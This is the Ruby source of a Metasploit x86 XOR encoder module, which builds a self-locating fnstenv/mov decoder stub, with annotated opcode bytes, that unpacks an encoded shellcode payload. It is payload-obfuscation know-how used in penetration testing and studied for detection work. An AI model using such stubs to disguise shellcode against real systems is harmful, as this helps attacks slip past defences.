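##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder::Xor

  # x86 dword XOR encoder whose decoder stub finds its own address with the
  # fnstenv trick (no call/pop) and walks the encoded buffer with `loop`.
  def initialize
    super(
      'Name'        => 'Variable-length Fnstenv/mov Dword XOR Encoder',
      'Description' => %q{
        This encoder uses a variable-length mov equivalent instruction
        with fnstenv for getip.
      },
      'Author'      => 'spoonm',
      'Arch'        => ARCH_X86,
      'License'     => MSF_LICENSE,
      # 4-byte key applied to 4-byte blocks; the stub in decoder_stub
      # hard-codes the same dword granularity (xor DWORD, sub ebx,-4,
      # ECX = number of dwords).
      'Decoder'     =>
        {
          'KeySize'   => 4,
          'BlockSize' => 4,
        })
  end

  #
  # Returns the decoder stub that is adjusted for the size of the buffer
  # being encoded.
  #
  # Stub layout after the ECX load (19 bytes; ebx ends up pointing at fldz):
  #   fldz                       2 bytes  an FPU op so fnstenv has an EIP to record
  #   fnstenv [esp-12]           4 bytes  FPU env is 28 bytes; its EIP field
  #                                       (offset 12) therefore lands at [esp]
  #   pop ebx                    1 byte   ebx = address of fldz
  #   xor DWORD [ebx+0x13], key  7 bytes  0x13 = 19 = size of this stub, i.e.
  #                                       the first encoded dword past it
  #   sub ebx, -4                3 bytes  same as add ebx,4 without a 0x04 byte
  #   loop xor_xor               2 bytes  ECX counts remaining dwords
  #
  # The `XORK` placeholder is patched with the chosen key by the Xor base
  # class through state.decoder_key_offset.
  #
  # Raises BadGenerateError when a register named in SaveRegisters is one the
  # stub clobbers (EBX, ECX), or when the buffer is empty: that would load
  # ECX = 0 and `loop` would wrap, XORing ~4 GiB past the stub.
  #
  # NOTE: fnstenv [esp-12] writes a 28-byte block, so the 16 bytes at
  # [esp, esp+16) are overwritten as a side effect; the register-preservation
  # contract says nothing about that stack data.
  #
  def decoder_stub(state)
    # Sanity check that saved_registers doesn't overlap with modified_registers
    unless (modified_registers & saved_registers).empty?
      raise BadGenerateError
    end

    # An empty buffer would produce a stub with ECX = 0 (see above).
    raise BadGenerateError if state.buf.empty?

    # Number of 4-byte blocks, rounding a trailing partial block up
    # (identical to ((len - 1) / 4) + 1 for len >= 1).
    dword_count = (state.buf.length + 3) / 4

    decoder =
      Rex::Arch::X86.set(
        Rex::Arch::X86::ECX,
        dword_count,
        state.badchars) +
      "\xd9\xee" +               # fldz
      "\xd9\x74\x24\xf4" +       # fnstenv [esp - 12]
      "\x5b" +                   # pop ebx
      "\x81\x73\x13XORK" +       # xor_xor: xor DWORD [ebx + 0x13], xorkey
      "\x83\xeb\xfc" +           # sub ebx,-4
      "\xe2\xf4"                 # loop xor_xor

    # Tell the Xor base class where to splice the key into the stub.
    state.decoder_key_offset = decoder.index('XORK')

    decoder
  end

  # Indicate that this module can preserve some registers
  def can_preserve_registers?
    true
  end

  # A list of registers always touched by this encoder: EBX (getpc / cursor)
  # and ECX (loop counter). The ECX load emitted by Rex::Arch::X86.set is
  # assumed to touch only ECX.
  def modified_registers
    [ Rex::Arch::X86::EBX, Rex::Arch::X86::ECX ]
  end

  # Convert the SaveRegisters to an array of x86 register constants
  def saved_registers
    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
  end
end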